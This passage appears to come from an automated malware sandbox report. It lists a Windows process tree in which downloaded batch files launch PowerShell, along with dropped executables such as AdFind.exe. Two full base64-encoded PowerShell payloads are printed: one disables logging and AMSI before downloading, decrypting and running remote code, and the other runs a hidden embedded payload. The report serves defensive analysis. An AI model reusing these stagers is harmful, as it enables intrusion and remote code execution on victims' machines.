  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3320 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2340 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  - Loads dropped DLL
  PID:992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3160 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  - Loads dropped DLL
  PID:2204
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\Downloads\Marker.bat" "
  2⤵
  PID:1620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\Admin\Downloads\Marker.bat')|iex"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADMAMgAyAD0AWwBSAGUARgBdAC4AQQBTAFMAZQBtAGIAbAB5AC4ARwBFAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAEYAKAAkAEMAMwAyADIAKQB7ACQAYwA3ADQAMgA9ACQAYwAzADIAMgAuAEcAZQB0AFYAYQBMAFUARQAoACQAbgB1AGwAbAApADsASQBmACgAJABDADcANAAyAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAQwA3ADQAMgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABDADcANAAyAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdgBhAEwAPQBbAEMAbwBsAGwAZQBjAFQASQBvAE4AcwAuAEcARQBuAEUAcgBJAGMALgBEAEkAQwBUAEkAbwBOAGEAcgBZAFsAUwB0AFIASQBuAEcALABTAHkAcwB0AGUAbQAuAE8AQgBKAEUAQwBUAF0AXQA6ADoATgBFAHcAKAApADsAJAB2AGEATAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAB2AEEATAAuAEEARABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAEMANwA0ADIAWwAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQA9ACQAdgBhAGwAfQBFAEwAUwBFAHsAWwBTAEMAcgBJAFAAdABCAGwATwBDAGsAXQAuACIARwBFAHQARgBpAGUAYABMAEQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAYQBMAHUARQAoACQAbgBVAGwATAAsACgATgBlAFcALQBPAGIAagBlAGMAVAAgAEMATwBsAGwARQBjAHQASQBPAG4AUwAuAEcAZQBuAEUAcgBpAEMALgBIAEEAUwBIAFMARQBUAFsAcwB0AHIASQBuAGcAXQApACkAfQAkAFIARQBGAD0AWwBSAGUARgBdAC4AQQBTAHMAZQBtAEIATABZAC4ARwBFAFQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBlAGYALgBHAEUAdABGAEkARQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUARQAoACQATgBVAGwATAAsACQAdAByAHUARQApADsAfQA7AFsAUwBZAHMAVABFAE0ALgBOAGUAdAAuAFMARQByAFYASQBjAEUAUABPAGkATgB0AE0AQQBOAEEAZwBFAFIAXQA6ADoARQBYAFAAZQBDAFQAMQAwADAAQwBvAE4AdABpAG4AVQBlAD0AMAA7ACQANQA3ADkAMwA9AE4AZQBXAC0ATwBiAGoARQBDAFQAIABTAHkAcwB0AEUATQAuAE4ARQB0AC4AVwBFAGIAQwBMAEkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAG4AYwBPAGQAaQBOAEcAXQA6ADoAVQBuAGkAQwBPAGQARQAuAEcAZQB0AFMAVAByAEkAbgBnACgAWwBDAE8AbgB2AGUAcgBUAF0AOgA6AEYAcgBPAG0AQgBhAHMARQA2ADQAUwB0AFIAaQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBAHgAQQBEAFkAQQBPAGcAQQAzAEEARABnAEEATQBRAEEAdwBBAEEAPQA9ACcAKQApACkAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkADUANwA5ADMALgBIAEUAYQBkAEUAcgBTAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAA1ADcAOQAzAC4AUABSAG8AWABZAD0AWwBTAHkAcwB0AEUAbQAuAE4AZQB0AC4AVwBFAEIAUgBFAHEAVQBFAFMAVABdADoAOgBEAEUAZgBhAHUAbAB0AFcARQBiAFAAcgBvAFgAWQA7ACQANQA3ADkAMwAuAFAAcgBPAFgAeQAuAEMAcgBFAGQARQBOAFQAaQBhAEwAUwAgAD0AIABbAFMAeQBzAFQARQBtAC4ATgBFAHQALgBDAFIARQBkAEUATgBUAGkAYQBsAEMAYQBDAEgARQBdADoAOgBEAEUARgBBAFUATABUAE4AZQBUAFcAbwBSAGsAQwBSAGUAZABFAE4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkADUANwA5ADMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAFQAZQBtAC4AVABlAHgAVAAuAEUAbgBDAG8ARABJAE4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAVABCAFkAdABFAFMAKAAnAGoAXQA2AFYALgB5AHoAKgAhAGkAbAAmAFIARAA3AEIALwBjADAAMwBoAHcAQQByAGQALQBGAG8AdQBVADUAZwAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAEcAUwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMATwBVAE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAHgATwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkADUANwA5ADMALgBIAGUAQQBEAEUAcgBzAC4AQQBkAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAGcAZgBJAFoAUABrAGEAQgB0AE0AUABJAHkAZQBXAD0AYwBFAGQANQA4AGkAcQBzAEgAeQBnAEsAcQBqACsAdgAxAFoANQBRAE4AawB4AGoAYgBRAEkAPQAiACkAOwAkAEQAYQBUAGEAPQAkADUANwA5ADMALgBEAE8AVwBOAGwATwBhAEQARABhAFQAYQAoACQAUwBFAHIAKwAkAFQAKQA7ACQASQBWAD0AJABkAGEAdABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABhAD0AJABEAGEAVABBAFsANAAuAC4AJABkAGEAdABBAC4AbABlAE4AZwBUAEgAXQA7AC0AagBvAEkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3032
- C:\Users\Admin\Downloads\File.exe
  "C:\Users\Admin\Downloads\File.exe"
  2⤵
  - Executes dropped EXE
  PID:2996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3860 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=3788 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3856 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3544 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=3068 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2416 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3936 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1956 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3100 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1620
- C:\Users\Admin\Downloads\AdFind.exe
  "C:\Users\Admin\Downloads\AdFind.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2588
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\Downloads\Trial.bat" "
  2⤵
  PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASABHADYAWQBXAGMAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvAHcAYQBxAFEAYgBLAHMATwBOAG8ARgBMAGsAMABpAFYAYgBtADEAaQBvAEEAJwAnACsAJwAnADMARQB7ADAAfQBBAEUAQwBIAEQAcAB0ADcATQBYAGUAcwB2AFkAUwBlAHcAawBoAHYAZgA3ADMAbQB6AFUANABvAGQAZQBrAGwAegB1AHAAbABrAGoAMgBaAFcAWgAyADkAcABsAG4AWgBuAGEAKwBTAGcATgBCAGUAYQBxAEkAaABaAHMAcgBYADkAKwArAFUAWABhAGYAaAB6AE8AYwBLAEYAbwBsAHUAMABFAGkATQBaAFEASwB3ADkAYQBrAHAAVAAvAHQAVgA1AGIAUgA4AE0AdQBSADgAbABIAFIAcABtAGkANQBiAFAASQBFADAAMwBSADIAZQB1AHEAcwBzAG8AeQBrAFkAagB1AHYAdABvAGgAQQBlAFUANgBTAEcAMABaAEoAcgB1AG4ASwBYADgAbwBvAEoAaABrADUAdQBMAGoANQBRAGcASwBoAGYARgBVAHEAZgAxAFoAYgBqAE4AOQBnAHQAaABQAGIATwBEAGkASQBpAFgASwBBADAAbABEAHUAbgBmAE0AQQBTACsAKwBxAC8AcABKAFIAbwBhAGwALwAvAEsASABxADAANABQAGEAcgBIAHAAMgB1ADgASQBzADEAMQBSAC8AawB3AHUAUwBWAEUAUABHAFYARgAzADUAcABzAHMARAByAHoAWgBMAG8AcQBsAGQARwBtAFEAOAA1ADMATgBSAEgAZABHADAAZgBsAGcAZABwAEQAbQBlAGsAewAwAH0ANQBZAHUAeQBOAGQASQBtAEkAZQA1AGkAcgBjADUAdQBrACsARwBSAEcAcgBMAE4AMQBkAFMAOQByAFoAUwBtAGsAcQBEAEwAMgBNAEIAeQBnAE0ATQA1AEwAbgBxAHEARgBNADUAUQBuAFQAMgBlAHsAMAB9ADMAYgBiAG8ANwAvAG4ASwBWAEMAcABxAFEAYQBpAGMAVgBKAE8ATgBMAG4AMgBSADMATgBDAEIANQB0AFkAMwBUAGsASgBGAEwATQBwACsAQgBsAGkAOAB5AG0AawBZAHoAWABRAGUAewAwAH0ATwA3ADQAZwBXAGkAVgBkAE0AVwBZAG8ALwA4AFcATQAxAGkAUAByAEUAcgB6AFgASwBtAG4ANwBTAGkARABsAGkAVQB3ADMASQBMAEQAUABYAGIAVABMAHcAewAwAH0AVQBqAFcAMQBYADEARwBVACsAMwBiAE4ARABoAGUAMgBRAEUAZwBQAGgATgA0AGoAZwB2AGkAYgBRADUAUABuAEwANABNADAAewAwAH0ANgAnACcAKwAnACcAVwBpAGkALwBhAGIARgBEAHcARwAnACcAKwAnACcALwBOADQAegBrAHQAdABEADgAcQBsAHEARgAwAHcAUQBFAHMAZQBMAGEAQgBhAGUAVQBxAFcAewAwAH0ARgA5ADkAbwBpADYAVQBwAG4ASABrAGYARgBhAFkANwAnACcAKwAnACcAVgBTAEUALwBUAFcAagBUAHYAbQB3AHQAcAAwAHkARwBrADQAZQA3AEwAdwBIAFEAMABxAHkANAB1AGIAbwAxAEIASwB2AGMAegBxAEoAcABuAFQAbABEAFEAMwBLAFUANQBvAFUAQgBKAFgAZQB5ADQAMgBaAE0ANQBJAGcAVQBxADEARgBPAHUAQgBqADUAcQA2ADIAeQBCAGgAawB6AEEAUwBZAFMASABCAGwAaABUADUAUQBlADAAcwBvAGUASgBSADEAMQA1AFIARgBwAEkATQBCAFIARABmAEgATAB5AEMAMABPAHYAZgBPADcATwBOAG4ANgBaADIAMABpADUASgBBAEwALwB0AEgARABoAGIAbQBVAE8ANgBrAEYASgA2AGwAeQBLAGIAOABuAFEANQBCACcAJwArACcAJwB5AEgAVgBZAFQAagBQAEQAYwBWAGIAUQBiADQARwBoAHUASQBUAHoARQBoAG8ASwBDAGoATgA2AFcANABMAHIAUQBRAHYAaAB1AHEAVAB1ADkAMABWAEUAegAnACcAKwAnACcAVABBAHUAUwBqAE4AegBmAFIALwA0AHIAawA3ADEAKwBGAHAATAByAEoAVgBBAEsARQBGAEQASwA3ADgASgBRAGsAbwBaAGgASQBTAFEAMgBuAFQAawBOAGcAYgBuADAAYgBsACsAZQBxACcAJwArACcAJwB6AGcARABpAFkATQBVAGcAagBzAEgAUQBIAEEAWQBFAFYAQwBZAFEAdgBKAEcARwB5ADAAQwBqAEkAbwBWAGQAOQBJAGoAcgBKAGsAcABFAEUAUgBJAHIANgA0AFQASQBjAFEAYgBYAFkANQBVAHAAQgBNAEIAeQBSAFUASAAzAEoAMABUAEkAbAB0AHYAeQBYADAASgBTAFkANwBMAGsASgA4AGYAWQBaAEYANABZAHkAcABKAG0AQQBjAGkAUgBoAEwAagBqADIAZgA5AHsAMAB9ADQAcABoAEEAVgAvAGoAZwBaADIAUQBWAEkASwB6AE4AdABhAG0AKwBFAHoASQBSAEsAMwBPAFIAOQB5AGQAUQBkAFMAZwBVAG0AbQBRAEEAOAAzAEkAdwBuAE4AcwA3AEoAVQBXAE4AYgBkAEwAUgAnACcAKwAnACcAMwA1AGcAWAAxAEUASAB6AGoAVABzAHEANgA0AGEAYwAnACcAKwAnACcARgByAFgAWABXADgATwB2AEMAYgA5AEMAZABIADMAdgAnACcAKwAnACcAQwA0AGcAbQB0AGQAMwBnADMAYwBIAEsAdgA1AFIANABqAHUAbwA3AFcAdwBYAEUAUABCAGUARwBuAGsASgB6ADQAdwA0AGIAdwB6AHoAcgBDADgAVgBDADcAVAB5ADIANwBFAFEAZQAyAGQAUwBYAEgAdABTAGkAaQBWAGoAUgBHAFkAYQA4AGYAQgA4AHoAeQBtAG0AMwBUAEgAKwBjAFcAWABiAGQASAAwAHQAYgBXAFIAdABCAG8AdABLADgAdABWAEsAOAAnACcAKwAnACcAMwBMAHUAcgBXAEEAZwBBAGMAZwA5ADQAQwBkAEIASwA2AHYAagArAEgATQBWAFQAWABpADMATwA3AGsAOQB0AFcAaAA1ADEAOQBjAGkANQB2AFIAbwBmAHUAWgBNAFQAYQBaAHMATwBOADUAeQBPAGUAKwAwAGYAagBwAG0AbQBhAEoAeQAnACcAKwAnACcARgB1AGQAagBjAEkAMgBUAHkAcwBkAHoAZgBYAHQAVQB0ACsAMQBRADQAUwB1ADUARgB5ADgAOABSAHAATABOAEEAWgBRAGsANQA2AE4AbgBSAHQALwBuAGwAcwBaADgAZwB6AGgAegBoAGEAOABsAEUAdwB3AG0ARQByAGMAcABCADkANQBGAEEAeQA2AFEAOQBjAHUAOQA5ADMAYgBUAFIAbwBmAGIAbAB0AG4AcABpAFIAZQBUAEsANgB7ADAAfQByAEUAOQBHAGgANwBTAHkAZgBMADYATQBvAGEANQB1ADIANwAzAFAANQB0AFcAbwB7ADAAfQBPAFMAQgB6ADUAWgBBADMAQQB0AGoAbgBCADAAQwBUAEsAUgBjAHsAMAB9AGoARQBjADUAQgBwAHYAawBmADIAKwB7ADAAfQA3AFAARAAvAEgAQwA1AHMAZwBHAEcAWABkAHkAaQAxAHIAewAwAH0AZQBPAGwANgBEAFAAYQB2AEIAbwBjAGMARABWAG4AdgBHAHEAUAB6AHkAYwBZADEAegBkAHIAWQBhADYAQwAyAHsAMAB9AFUAZQB0AEMAUABWAEIASABFAGQAMgBIADYAUAA4AHIAdgBuAFEATgBHACcAJwArACcAJwB2AEQAawBJAGUAagAzADMAcgBqAHUAVABtADgAWgBoAC8ATQBwAHQAUAAzADQAbQB0ADUAWgAzAE8AWgB5AEwALwByAGQAdgBOAHoATQBLAG0AdABnADQAcwBQAHsAMAB9ACsAYwBqAE8AawB3ADQARwBwAGoAbQA4AEIAMgBRAFkAagBxAGcAcQBhAGcAZgB6AGkAcABSAGUAQwAvAHIANQA5AHMAMwBsAGIAdAAwAHUARQBlAE0AbAAxAHAAJwAnACsAJwAnAEUARgAyAGQANQBqAEIAawBRAEIAawBwAC8AbQBiAHcAdQB6ADkAewAwAH0AZABLAGYAYwA0AGwAUgBxAGEAVgByAHcATgBGAGkAUgBMAEMAWQBOAFcAQwBzADIAMgBwAEQAewAwAH0AaQBqAEEAZQB5AG0AMgB5AEwAUAByAFMAeQBiAFkAJwAnACsAJwAnAE8AUgAvAFcANwBRAEsAYgB7ADAAfQAnACcAKwAnACcANgBiAHEAUQByAGoANABMADYAVQA1AGMAcABsADAANQBQAEoAKwBBAG0ASgBKAEgAawBkAC8AVwBjAHAASgBHAEkARABlAHUAKwBiAGwAbgBRAEcAcQB7ADAAfQA3AHEAMQBHAGsAeQArAHMAdgA1AC8ARABsAFIAaQB1AE0ARwBiAEsANQBTACcAJwArACcAJwBIAEIASwA0ADYAdwB3AEQAdgBiAG8AWABOAEcAMABYADQAOABYAFAAQwBRAEUARgBMAEsAZgBJAFAAWQBTAGUASABEADQAQQBnAG8AUABWAE0ASgB0AEwAWgBBAFEAMgBwAHkAegBmAFEAQwAzAE4AMwB1AGsAdwB6ADUAOABnAEYAcwBOADcAagA2AFYAagB3AGoASgBFADkAQQAvAEkATABkAEsAUgBjAGoAbQB1AHQAKwBzAEsAdwArAGQAWAA4AHUAYwBYAFUARwBMADQAVgAvADQAcgA4AHsAMAB9ADUAVwAnACcAKwAnACcAdgB2AEoANwBxAHYAWQBaAEIAawBGAE8AagArAHMAZgByACsAdwAxAHcAOQArAEkAUQBRAGoAVABBAFYASQArAGwAQwBaACcAJwArACcAJwBHAGQAbQArAEcARgA1AEEAWQBwAGMAdQBlAHkARgArADYARQBBAHEAegBIAGUAZgBmAEYAQgBmAHIATQBSAEIARAA1ADUAbgBSAFgAUAA0AEcANgBiAHMAZQBIAC8ATwBDAHcAQQBBACcAJwApAC0AZgAnACcAeAAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
    3⤵
    PID:2204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
